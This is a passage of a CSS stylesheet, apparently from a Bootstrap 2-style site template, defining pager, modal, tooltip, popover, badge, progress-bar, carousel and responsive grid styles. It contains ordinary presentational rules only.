.pager li > span {
	display: inline-block;
	padding: 5px 14px;
	background-color: #fff;
	border: 1px solid #ddd;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
	text-decoration: none;
	background-color: #f5f5f5;
}
.pager .next > a,
.pager .next > span {
	float: right;
}
.pager .previous > a,
.pager .previous > span {
	float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
	color: #999;
	background-color: #fff;
	cursor: default;
}
.modal-backdrop {
	position: fixed;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	z-index: 1040;
	background-color: #000;
}
.modal-backdrop.fade {
	opacity: 0;
}
.modal-backdrop,
.modal-backdrop.fade.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.modal-header {
	padding: 9px 15px;
	border-bottom: 1px solid #eee;
}
.modal-header .close {
	margin-top: 2px;
}
.modal-header h3 {
	margin: 0;
	line-height: 30px;
}
.modal-body {
	width: 98%;
	position: relative;
	max-height: 400px;
	padding: 1%;
}
.modal-body iframe {
	width: 100%;
	max-height: none;
	border: 0 !important;
}
.modal-form {
	margin-bottom: 0;
}
.modal-footer {
	padding: 14px 15px 15px;
	margin-bottom: 0;
	text-align: right;
	background-color: #f5f5f5;
	border-top: 1px solid #ddd;
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
	-webkit-box-shadow: inset 0 1px 0 #fff;
	-moz-box-shadow: inset 0 1px 0 #fff;
	box-shadow: inset 0 1px 0 #fff;
	*zoom: 1;
}
.modal-footer:before,
.modal-footer:after {
	display: table;
	content: "";
	line-height: 0;
}
.modal-footer:after {
	clear: both;
}
.modal-footer .btn + .btn {
	margin-left: 5px;
	margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
	margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
	margin-left: 0;
}
.tooltip {
	position: absolute;
	z-index: 1030;
	display: block;
	visibility: visible;
	font-size: 11px;
	line-height: 1.4;
	opacity: 0;
	filter: alpha(opacity=0);
}
.tooltip.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.tooltip.top {
	margin-top: -3px;
	padding: 5px 0;
}
.tooltip.right {
	margin-left: 3px;
	padding: 0 5px;
}
.tooltip.bottom {
	margin-top: 3px;
	padding: 5px 0;
}
.tooltip.left {
	margin-left: -3px;
	padding: 0 5px;
}
.tooltip-inner {
	max-width: 200px;
	padding: 8px;
	color: #fff;
	text-align: center;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.tooltip-arrow {
	position: absolute;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 5px 5px 0;
	border-top-color: #000;
}
.tooltip.right .tooltip-arrow {
	top: 50%;
	left: 0;
	margin-top: -5px;
	border-width: 5px 5px 5px 0;
	border-right-color: #000;
}
.tooltip.left .tooltip-arrow {
	top: 50%;
	right: 0;
	margin-top: -5px;
	border-width: 5px 0 5px 5px;
	border-left-color: #000;
}
.tooltip.bottom .tooltip-arrow {
	top: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 0 5px 5px;
	border-bottom-color: #000;
}
.popover {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 1060;
	display: none;
	max-width: 276px;
	padding: 1px;
	text-align: left;
	background-color: #fff;
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	white-space: normal;
}
.popover.top {
	margin-top: -10px;
}
.popover.right {
	margin-left: 10px;
}
.popover.bottom {
	margin-top: 10px;
}
.popover.left {
	margin-left: -10px;
}
.popover-title {
	margin: 0;
	padding: 8px 14px;
	font-size: 14px;
	font-weight: normal;
	line-height: 18px;
	background-color: #f7f7f7;
	border-bottom: 1px solid #ebebeb;
	-webkit-border-radius: 5px 5px 0 0;
	-moz-border-radius: 5px 5px 0 0;
	border-radius: 5px 5px 0 0;
}
.popover-title:empty {
	display: none;
}
.popover-content {
	padding: 9px 14px;
}
.popover .arrow,
.popover .arrow:after {
	position: absolute;
	display: block;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.popover .arrow {
	border-width: 11px;
}
.popover .arrow:after {
	border-width: 10px;
	content: "";
}
.popover.top .arrow {
	left: 50%;
	margin-left: -11px;
	border-bottom-width: 0;
	border-top-color: #999;
	border-top-color: rgba(0,0,0,0.25);
	bottom: -11px;
}
.popover.top .arrow:after {
	bottom: 1px;
	margin-left: -10px;
	border-bottom-width: 0;
	border-top-color: #fff;
}
.popover.right .arrow {
	top: 50%;
	left: -11px;
	margin-top: -11px;
	border-left-width: 0;
	border-right-color: #999;
	border-right-color: rgba(0,0,0,0.25);
}
.popover.right .arrow:after {
	left: 1px;
	bottom: -10px;
	border-left-width: 0;
	border-right-color: #fff;
}
.popover.bottom .arrow {
	left: 50%;
	margin-left: -11px;
	border-top-width: 0;
	border-bottom-color: #999;
	border-bottom-color: rgba(0,0,0,0.25);
	top: -11px;
}
.popover.bottom .arrow:after {
	top: 1px;
	margin-left: -10px;
	border-top-width: 0;
	border-bottom-color: #fff;
}
.popover.left .arrow {
	top: 50%;
	right: -11px;
	margin-top: -11px;
	border-right-width: 0;
	border-left-color: #999;
	border-left-color: rgba(0,0,0,0.25);
}
.popover.left .arrow:after {
	right: 1px;
	border-right-width: 0;
	border-left-color: #fff;
	bottom: -10px;
}
.thumbnails {
	margin-left: -20px;
	list-style: none;
	*zoom: 1;
}
.thumbnails:before,
.thumbnails:after {
	display: table;
	content: "";
	line-height: 0;
}
.thumbnails:after {
	clear: both;
}
.row-fluid .thumbnails {
	margin-left: 0;
}
.thumbnails > li {
	float: left;
	margin-bottom: 18px;
	margin-left: 20px;
}
.thumbnail {
	display: block;
	padding: 4px;
	line-height: 18px;
	border: 1px solid #ddd;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	-webkit-transition: all .2s ease-in-out;
	-moz-transition: all .2s ease-in-out;
	-o-transition: all .2s ease-in-out;
	transition: all .2s ease-in-out;
}
a.thumbnail:hover,
a.thumbnail:focus {
	border-color: #005e8d;
	-webkit-box-shadow: 0 1px 4px rgba(0,105,214,0.25);
	-moz-box-shadow: 0 1px 4px rgba(0,105,214,0.25);
	box-shadow: 0 1px 4px rgba(0,105,214,0.25);
}
.thumbnail > img {
	display: block;
	max-width: 100%;
	margin-left: auto;
	margin-right: auto;
}
.thumbnail .caption {
	padding: 9px;
	color: #555;
}
.label,
.badge {
	display: inline-block;
	padding: 2px 4px;
	font-size: 10.998px;
	font-weight: bold;
	line-height: 14px;
	color: #fff;
	vertical-align: baseline;
	white-space: nowrap;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #999;
}
.label {
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.badge {
	padding-left: 9px;
	padding-right: 9px;
	-webkit-border-radius: 9px;
	-moz-border-radius: 9px;
	border-radius: 9px;
}
.label:empty,
.badge:empty {
	display: none;
}
a.label:hover,
a.label:focus,
a.badge:hover,
a.badge:focus {
	color: #fff;
	text-decoration: none;
	cursor: pointer;
}
.label-important,
.badge-important {
	background-color: #b94a48;
}
.label-important[href],
.badge-important[href] {
	background-color: #953b39;
}
.label-warning,
.badge-warning {
	background-color: #f89406;
}
.label-warning[href],
.badge-warning[href] {
	background-color: #c67605;
}
.label-success,
.badge-success {
	background-color: #468847;
}
.label-success[href],
.badge-success[href] {
	background-color: #356635;
}
.label-info,
.badge-info {
	background-color: #3a87ad;
}
.label-info[href],
.badge-info[href] {
	background-color: #2d6987;
}
.label-inverse,
.badge-inverse {
	background-color: #333;
}
.label-inverse[href],
.badge-inverse[href] {
	background-color: #1a1a1a;
}
.btn .label,
.btn .badge {
	position: relative;
	top: -1px;
}
.btn-mini .label,
.btn-mini .badge {
	top: 0;
}
@-webkit-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-moz-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-ms-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-o-keyframes progress-bar-stripes {
	from {
		background-position: 0 0;
	}
	to {
		background-position: 40px 0;
	}
}
@keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
.progress {
	overflow: hidden;
	height: 18px;
	margin-bottom: 18px;
	background-color: #f7f7f7;
	background-image: -moz-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#f5f5f5),to(#f9f9f9));
	background-image: -webkit-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: -o-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: linear-gradient(to bottom,#f5f5f5,#f9f9f9);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#fff9f9f9', GradientType=0);
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.progress .bar {
	width: 0%;
	height: 100%;
	color: #fff;
	float: left;
	font-size: 12px;
	text-align: center;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #0e90d2;
	background-image: -moz-linear-gradient(top,#149bdf,#0480be);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#149bdf),to(#0480be));
	background-image: -webkit-linear-gradient(top,#149bdf,#0480be);
	background-image: -o-linear-gradient(top,#149bdf,#0480be);
	background-image: linear-gradient(to bottom,#149bdf,#0480be);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff149bdf', endColorstr='#ff0480be', GradientType=0);
	-webkit-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	-moz-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	-webkit-transition: width .6s ease;
	-moz-transition: width .6s ease;
	-o-transition: width .6s ease;
	transition: width .6s ease;
}
.progress .bar + .bar {
	-webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
	-moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
	box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
}
.progress-striped .bar {
	background-color: #149bdf;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	-webkit-background-size: 40px 40px;
	-moz-background-size: 40px 40px;
	-o-background-size: 40px 40px;
	background-size: 40px 40px;
}
.progress.active .bar {
	-webkit-animation: progress-bar-stripes 2s linear infinite;
	-moz-animation: progress-bar-stripes 2s linear infinite;
	-ms-animation: progress-bar-stripes 2s linear infinite;
	-o-animation: progress-bar-stripes 2s linear infinite;
	animation: progress-bar-stripes 2s linear infinite;
}
.progress-danger .bar,
.progress .bar-danger {
	background-color: #dd514c;
	background-image: -moz-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ee5f5b),to(#c43c35));
	background-image: -webkit-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: -o-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: linear-gradient(to bottom,#ee5f5b,#c43c35);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b', endColorstr='#ffc43c35', GradientType=0);
}
.progress-danger.progress-striped .bar,
.progress-striped .bar-danger {
	background-color: #ee5f5b;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-success .bar,
.progress .bar-success {
	background-color: #5eb95e;
	background-image: -moz-linear-gradient(top,#62c462,#57a957);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#62c462),to(#57a957));
	background-image: -webkit-linear-gradient(top,#62c462,#57a957);
	background-image: -o-linear-gradient(top,#62c462,#57a957);
	background-image: linear-gradient(to bottom,#62c462,#57a957);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462', endColorstr='#ff57a957', GradientType=0);
}
.progress-success.progress-striped .bar,
.progress-striped .bar-success {
	background-color: #62c462;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-info .bar,
.progress .bar-info {
	background-color: #4bb1cf;
	background-image: -moz-linear-gradient(top,#5bc0de,#339bb9);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#5bc0de),to(#339bb9));
	background-image: -webkit-linear-gradient(top,#5bc0de,#339bb9);
	background-image: -o-linear-gradient(top,#5bc0de,#339bb9);
	background-image: linear-gradient(to bottom,#5bc0de,#339bb9);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff339bb9', GradientType=0);
}
.progress-info.progress-striped .bar,
.progress-striped .bar-info {
	background-color: #5bc0de;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-warning .bar,
.progress .bar-warning {
	background-color: #faa732;
	background-image: -moz-linear-gradient(top,#fbb450,#f89406);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fbb450),to(#f89406));
	background-image: -webkit-linear-gradient(top,#fbb450,#f89406);
	background-image: -o-linear-gradient(top,#fbb450,#f89406);
	background-image: linear-gradient(to bottom,#fbb450,#f89406);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffab44f', endColorstr='#fff89406', GradientType=0);
}
.progress-warning.progress-striped .bar,
.progress-striped .bar-warning {
	background-color: #fbb450;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.accordion {
	margin-bottom: 18px;
}
.accordion-group {
	margin-bottom: 2px;
	border: 1px solid #e5e5e5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.accordion-heading {
	border-bottom: 0;
}
.accordion-heading .accordion-toggle {
	display: block;
	padding: 8px 15px;
}
.accordion-toggle {
	cursor: pointer;
}
.accordion-inner {
	padding: 9px 15px;
	border-top: 1px solid #e5e5e5;
}
.carousel {
	position: relative;
	margin-bottom: 18px;
	line-height: 1;
}
.carousel-inner {
	overflow: hidden;
	width: 100%;
	position: relative;
}
.carousel-inner > .item {
	display: none;
	position: relative;
	-webkit-transition: .6s ease-in-out left;
	-moz-transition: .6s ease-in-out left;
	-o-transition: .6s ease-in-out left;
	transition: .6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
	display: block;
	line-height: 1;
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
	display: block;
}
.carousel-inner > .active {
	left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
	position: absolute;
	top: 0;
	width: 100%;
}
.carousel-inner > .next {
	left: 100%;
}
.carousel-inner > .prev {
	left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
	left: 0;
}
.carousel-inner > .active.left {
	left: -100%;
}
.carousel-inner > .active.right {
	left: 100%;
}
.carousel-control {
	position: absolute;
	top: 40%;
	left: 15px;
	width: 40px;
	height: 40px;
	margin-top: -20px;
	font-size: 60px;
	font-weight: 100;
	line-height: 30px;
	color: #fff;
	text-align: center;
	background: #222;
	border: 3px solid #fff;
	-webkit-border-radius: 23px;
	-moz-border-radius: 23px;
	border-radius: 23px;
	opacity: 0.5;
	filter: alpha(opacity=50);
}
.carousel-control.right {
	left: auto;
	right: 15px;
}
.carousel-control:hover,
.carousel-control:focus {
	color: #fff;
	text-decoration: none;
	opacity: 0.9;
	filter: alpha(opacity=90);
}
.carousel-indicators {
	position: absolute;
	top: 15px;
	right: 15px;
	z-index: 5;
	margin: 0;
	list-style: none;
}
.carousel-indicators li {
	display: block;
	float: left;
	width: 10px;
	height: 10px;
	margin-left: 5px;
	text-indent: -999px;
	background-color: #ccc;
	background-color: rgba(255,255,255,0.25);
	border-radius: 5px;
}
.carousel-indicators .active {
	background-color: #fff;
}
.carousel-caption {
	position: absolute;
	left: 0;
	right: 0;
	bottom: 0;
	padding: 15px;
	background: #333;
	background: rgba(0,0,0,0.75);
}
.carousel-caption h4,
.carousel-caption p {
	color: #fff;
	line-height: 18px;
}
.carousel-caption h4 {
	margin: 0 0 5px;
}
.carousel-caption p {
	margin-bottom: 0;
}
.hero-unit {
	padding: 60px;
	margin-bottom: 30px;
	font-size: 18px;
	font-weight: 200;
	line-height: 27px;
	color: inherit;
	background-color: #eee;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.hero-unit h1 {
	margin-bottom: 0;
	font-size: 60px;
	line-height: 1;
	color: inherit;
	letter-spacing: -1px;
}
.hero-unit li {
	line-height: 27px;
}
.pull-right {
	float: right;
}
.pull-left {
	float: left;
}
.hide {
	display: none;
}
.show {
	display: block;
}
.invisible {
	visibility: hidden;
}
.affix {
	position: fixed;
}
@-ms-viewport {
	width: device-width;
}
.hidden {
	display: none;
	visibility: hidden;
}
.visible-phone {
	display: none !important;
}
.visible-tablet {
	display: none !important;
}
.hidden-desktop {
	display: none !important;
}
.visible-desktop {
	display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
	.hidden-desktop {
		display: inherit !important;
	}
	.visible-desktop {
		display: none !important;
	}
	.visible-tablet {
		display: inherit !important;
	}
	.hidden-tablet {
		display: none !important;
	}
}
@media (max-width: 767px) {
	.hidden-desktop {
		display: inherit !important;
	}
	.visible-desktop {
		display: none !important;
	}
	.visible-phone {
		display: inherit !important;
	}
	.hidden-phone {
		display: none !important;
	}
}
.visible-print {
	display: none !important;
}
@media print {
	.visible-print {
		display: inherit !important;
	}
	.hidden-print {
		display: none !important;
	}
}
@media (max-width: 767px) {
	body {
		padding-left: 20px;
		padding-right: 20px;
	}
	.navbar-fixed-top,
	.navbar-fixed-bottom,
	.navbar-static-top {
		margin-left: -20px;
		margin-right: -20px;
	}
	.container-fluid {
		padding: 0;
	}
	.dl-horizontal dt {
		float: none;
		clear: none;
		width: auto;
		text-align: left;
	}
	.dl-horizontal dd {
		margin-left: 0;
	}
	.dropdown-menu .menuitem-group {
		background-color: #10223e;
		color: #eee;
	}
	.container {
		width: auto;
	}
	.row-fluid {
		width: 100%;
	}
	.row,
	.thumbnails {
		margin-left: 0;
	}
	.thumbnails > li {
		float: none;
		margin-left: 0;
	}
	[class*="span"],
	.uneditable-input[class*="span"],
	.row-fluid [class*="span"] {
		float: none;
		display: block;
		width: 100%;
		margin-left: 0;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.span12,
	.row-fluid .span12 {
		width: 100%;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.row-fluid [class*="offset"]:first-child {
		margin-left: 0;
	}
	.input-large,
	.input-xlarge,
	.input-xxlarge,
	input[class*="span"],
	select[class*="span"],
	textarea[class*="span"],
	.uneditable-input {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.input-prepend input,
	.input-append input,
	.input-prepend input[class*="span"],
	.input-append input[class*="span"] {
		display: inline-block;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 0;
	}
}
@media (max-width: 480px) {
	.nav-collapse {
		-webkit-transform: translate3d(0,0,0);
	}
	.page-header h1 small {
		display: block;
		line-height: 18px;
	}
	input[type="checkbox"],
	input[type="radio"] {
		border: 1px solid #ccc;
	}
	.form-horizontal .control-label {
		float: none;
		width: auto;
		padding-top: 0;
		text-align: left;
	}
	.form-horizontal .controls {
		margin-left: 0;
	}
	.form-horizontal .control-list {
		padding-top: 0;
	}
	.form-horizontal .form-actions {
		padding-left: 10px;
		padding-right: 10px;
	}
	.tag-category input#filter-search,
	.newsfeed-category input#filter-search {
		width: auto;
		margin-bottom: 9px;
	}
	.category-list input#filter-search {
		width: auto;
	}
	.media .pull-left,
	.media .pull-right {
		float: none;
		display: block;
		margin-bottom: 10px;
	}
	.media-object {
		margin-right: 0;
		margin-left: 0;
	}
	.modal-header .close {
		padding: 10px;
		margin: -10px;
	}
	.carousel-caption {
		position: static;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	.row {
		margin-left: -20px;
		*zoom: 1;
	}
	.row:before,
	.row:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row:after {
		clear: both;
	}
	[class*="span"] {
		float: left;
		min-height: 1px;
		margin-left: 20px;
	}
	.container,
	.navbar-static-top .container,
	.navbar-fixed-top .container,
	.navbar-fixed-bottom .container {
		width: 724px;
	}
	.span12 {
		width: 724px;
	}
	.span11 {
		width: 662px;
	}
	.span10 {
		width: 600px;
	}
	.span9 {
		width: 538px;
	}
	.span8 {
		width: 476px;
	}
	.span7 {
		width: 414px;
	}
	.span6 {
		width: 352px;
	}
	.span5 {
		width: 290px;
	}
	.span4 {
		width: 228px;
	}
	.span3 {
		width: 166px;
	}
	.span2 {
		width: 104px;
	}
	.span1 {
		width: 42px;
	}
	.offset12 {
		margin-left: 764px;
	}
	.offset11 {
		margin-left: 702px;
	}
	.offset10 {
		margin-left: 640px;
	}
	.offset9 {
		margin-left: 578px;
	}
	.offset8 {
		margin-left: 516px;
	}
	.offset7 {
		margin-left: 454px;
	}
	.offset6 {
		margin-left: 392px;
	}
	.offset5 {
		margin-left: 330px;
	}
	.offset4 {
		margin-left: 268px;
	}
	.offset3 {
		margin-left: 206px;
	}
	.offset2 {
		margin-left: 144px;
	}
	.offset1 {
		margin-left: 82px;
	}
	.row-fluid {
		width: 100%;
		*zoom: 1;
	}
	.row-fluid:before,
	.row-fluid:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row-fluid:after {
		clear: both;
	}
	.row-fluid [class*="span"] {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
		float: left;
		margin-left: 2.127659574%;
		*margin-left: 2.0744680846383%;
	}
	.row-fluid [class*="span"]:first-child {
		margin-left: 0;
	}
	.row-fluid .controls-row [class*="span"] + [class*="span"] {
		margin-left: 2.127659574%;
	}
	.row-fluid .span12 {
		width: 99.99999999%;
		*width: 99.946808500638%;
	}
	.row-fluid .span11 {
		width: 91.489361693%;
		*width: 91.436170203638%;
	}
	.row-fluid .span10 {
		width: 82.978723396%;
		*width: 82.925531906638%;
	}
	.row-fluid .span9 {
		width: 74.468085099%;
		*width: 74.414893609638%;
	}
	.row-fluid .span8 {
		width: 65.957446802%;
		*width: 65.904255312638%;
	}
	.row-fluid .span7 {
		width: 57.446808505%;
		*width: 57.393617015638%;
	}
	.row-fluid .span6 {
		width: 48.936170208%;
		*width: 48.882978718638%;
	}
	.row-fluid .span5 {
		width: 40.425531911%;
		*width: 40.372340421638%;
	}
	.row-fluid .span4 {
		width: 31.914893614%;
		*width: 31.861702124638%;
	}
	.row-fluid .span3 {
		width: 23.404255317%;
		*width: 23.351063827638%;
	}
	.row-fluid .span2 {
		width: 14.89361702%;
		*width: 14.840425530638%;
	}
	.row-fluid .span1 {
		width: 6.382978723%;
		*width: 6.3297872336383%;
	}
	.row-fluid .offset12 {
		margin-left: 104.255319138%;
		*margin-left: 104.14893615928%;
	}
	.row-fluid .offset12:first-child {
		margin-left: 102.127659564%;
		*margin-left: 102.02127658528%;
	}
	.row-fluid .offset11 {
		margin-left: 95.744680841%;
		*margin-left: 95.638297862277%;
	}
